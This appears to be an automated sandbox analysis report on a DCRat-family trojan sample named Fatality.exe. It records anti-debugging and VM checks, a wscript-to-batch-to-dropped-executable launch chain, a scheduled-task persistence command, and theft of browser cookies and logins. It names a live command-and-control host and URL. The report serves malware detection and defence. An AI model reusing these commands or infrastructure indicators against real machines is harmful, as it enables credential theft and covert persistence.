                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                              Source: VUumaksQ1L.25.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                              Source: VUumaksQ1L.25.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                              Source: VUumaksQ1L.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                              Source: Fatality.exe, Fatality.exe, 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                              Source: VUumaksQ1L.25.drBinary or memory string: outlook.office.comVMware20,11696487552s
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                              Source: VUumaksQ1L.25.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                              Source: VUumaksQ1L.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                              Source: wscript.exe, 00000002.00000002.2283430964.0000000002FF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q
                              Source: VUumaksQ1L.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                              Source: C:\Users\user\Desktop\Fatality.exe Process information queried: ProcessInformation

                              Anti Debugging

                              Source: C:\Users\user\Desktop\Fatality.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\Desktop\Fatality.exeFile opened: SIWDEBUG
                              Source: C:\Users\user\Desktop\Fatality.exeFile opened: NTICE
                              Source: C:\Users\user\Desktop\Fatality.exeFile opened: SICE
Source: C:\Users\user\Desktop\Fatality.exe; Code function: 0_2_04D56071 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Fatality.exe; Code function: 0_2_04D56396 mov eax, dword ptr fs:[00000030h]
Source: C:\Bridgemonitor\BridgeInto.exe; Process token adjusted: Debug
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; Process token adjusted: Debug
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; Process token adjusted: Debug
Source: C:\Bridgemonitor\BridgeInto.exe; Process token adjusted: Debug
Source: C:\Bridgemonitor\BridgeInto.exe; Process token adjusted: Debug
Source: C:\Recovery\dllhost.exe; Process token adjusted: Debug
Source: C:\Recovery\dllhost.exe; Process token adjusted: Debug
Source: C:\Bridgemonitor\BridgeInto.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Fatality.exe; Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe"
Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" "
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Bridgemonitor\BridgeInto.exe "C:\Bridgemonitor/BridgeInto.exe"
Source: C:\Bridgemonitor\BridgeInto.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"
Source: C:\Bridgemonitor\BridgeInto.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"
Source: C:\Bridgemonitor\BridgeInto.exe; Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /f
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP"
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003618000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager
Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 1",5,1,"","user","238576","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","NLZUZC3LX (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New
Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","238576","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","NLZUZC3LX (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
Source: C:\Bridgemonitor\BridgeInto.exe; Queries volume information: C:\Bridgemonitor\BridgeInto.exe VolumeInformation
Source: C:\Bridgemonitor\BridgeInto.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
Source: C:\Windows\System32\dllhost.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; Queries volume information: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe VolumeInformation
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; Queries volume information: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Bridgemonitor\BridgeInto.exe; Queries volume information: C:\Bridgemonitor\BridgeInto.exe VolumeInformation
Source: C:\Bridgemonitor\BridgeInto.exe; Queries volume information: C:\Bridgemonitor\BridgeInto.exe VolumeInformation
Source: C:\Recovery\dllhost.exe; Queries volume information: C:\Recovery\dllhost.exe VolumeInformation
Source: C:\Recovery\dllhost.exe; Queries volume information: C:\Recovery\dllhost.exe VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

Source: Yara match; File source: 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: BridgeInto.exe PID: 6828, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: EoNanmDGxPEtougVgAjHLx.exe PID: 6244, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: EoNanmDGxPEtougVgAjHLx.exe PID: 6928, type: MEMORYSTR
Source: Yara match; File source: Fatality.exe, type: SAMPLE
Source: Yara match; File source: 6.0.BridgeInto.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000000.2282375073.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match; File source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, type: DROPPED
Source: Yara match; File source: C:\Bridgemonitor\BridgeInto.exe, type: DROPPED
Source: Yara match; File source: C:\Recovery\dllhost.exe, type: DROPPED
Source: Yara match; File source: C:\ProgramData\ssh\WinStore.App.exe, type: DROPPED
Source: Yara match; File source: Fatality.exe, type: SAMPLE
Source: Yara match; File source: 6.0.BridgeInto.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, type: DROPPED
Source: Yara match; File source: C:\Bridgemonitor\BridgeInto.exe, type: DROPPED
Source: Yara match; File source: C:\Recovery\dllhost.exe, type: DROPPED
Source: Yara match; File source: C:\ProgramData\ssh\WinStore.App.exe, type: DROPPED
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal

                              Remote Access Functionality

Source: Yara match; File source: 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: BridgeInto.exe PID: 6828, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: EoNanmDGxPEtougVgAjHLx.exe PID: 6244, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: EoNanmDGxPEtougVgAjHLx.exe PID: 6928, type: MEMORYSTR
Source: Yara match; File source: Fatality.exe, type: SAMPLE
Source: Yara match; File source: 6.0.BridgeInto.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000000.2282375073.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match; File source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, type: DROPPED
Source: Yara match; File source: C:\Bridgemonitor\BridgeInto.exe, type: DROPPED
Source: Yara match; File source: C:\Recovery\dllhost.exe, type: DROPPED
Source: Yara match; File source: C:\ProgramData\ssh\WinStore.App.exe, type: DROPPED
Source: Yara match; File source: Fatality.exe, type: SAMPLE
Source: Yara match; File source: 6.0.BridgeInto.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, type: DROPPED
Source: Yara match; File source: C:\Bridgemonitor\BridgeInto.exe, type: DROPPED
Source: Yara match; File source: C:\Recovery\dllhost.exe, type: DROPPED
Source: Yara match; File source: C:\ProgramData\ssh\WinStore.App.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 145 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | Security Account Manager | 551 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 14 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 471 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 33 Masquerading | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 471 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph. ID: 1498676; Sample: Fatality.exe; Start date: 25/08/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
Fatality.exe | 79% | ReversingLabs | Win32.Trojan.DCRat |
Fatality.exe | 84% | Virustotal | | Browse
Fatality.exe | 100% | Avira | VBS/Runner.VPG |
Fatality.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\ProgramData\ssh\WinStore.App.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\Desktop\XAjYjGFx.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\vVSvSxGn.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Bridgemonitor\BridgeInto.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\pMLeDcaM.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe | 100% | Avira | VBS/Runner.VPG |
C:\Recovery\dllhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\LfISQjWH.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\ProgramData\ssh\WinStore.App.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\EiwsPBui.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\UXzikyum.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
C:\Bridgemonitor\BridgeInto.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\pMLeDcaM.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | 100% | Joe Sandbox ML | |
C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | |
C:\Recovery\dllhost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\LfISQjWH.log | 100% | Joe Sandbox ML | |
C:\Bridgemonitor\BridgeInto.exe | 100% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | 100% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe | 100% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\ProgramData\ssh\WinStore.App.exe | 100% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe | 100% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Recovery\dllhost.exe | 100% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\AqqubUji.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\EiwsPBui.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\LfISQjWH.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\MMFizuKP.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\UXzikyum.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\XAjYjGFx.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\nKZvhtVR.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\pMLeDcaM.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\rfcELAFu.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\vVSvSxGn.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              No Antivirus matches
Source | Detection | Scanner | Label | Link
373292cm.nyashka.top | 19% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
https://aefd.nelreports.net/api/report?cat=wsb | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | URL Reputation | safe |
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | 0% | URL Reputation | safe |
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
https://www.office.com/ | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud | safe |
http://www.enigmaprotector.com/openU | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
http://373292cm.nyP2 | 0% | Avira URL Cloud | safe |
http://373292cm.nyashka.top | 100% | Avira URL Cloud | malware |
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL | 0% | Avira URL Cloud | safe |
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | Avira URL Cloud | safe |
http://373292cm.nyashka.top/ | 100% | Avira URL Cloud | malware |
http://373292cm.nyP | 0% | Avira URL Cloud | safe |
http://www.enigmaprotector.com/ | 0% | Avira URL Cloud | safe |
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c& | 0% | Avira URL Cloud | safe |
http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | 100% | Avira URL Cloud | malware |
                              Name:373292cm.nyashka.top
                              IP:80.211.144.156
                              Active:true
                              Malicious:true
                              Reputation:unknown
                              Name:http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                              Malicious:true
                              Antivirus Detection:Avira URL Cloud: malware
                              Reputation:unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/WebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/chrome_newtabEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/ac/?q=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aefd.nelreports.net/api/report?cat=bingthWebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.enigmaprotector.com/openUFatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aefd.nelreports.net/api/report?cat=wsbWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              unknown
                              https://aefd.nelreports.net/api/report?cat=bingaotakWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              unknown
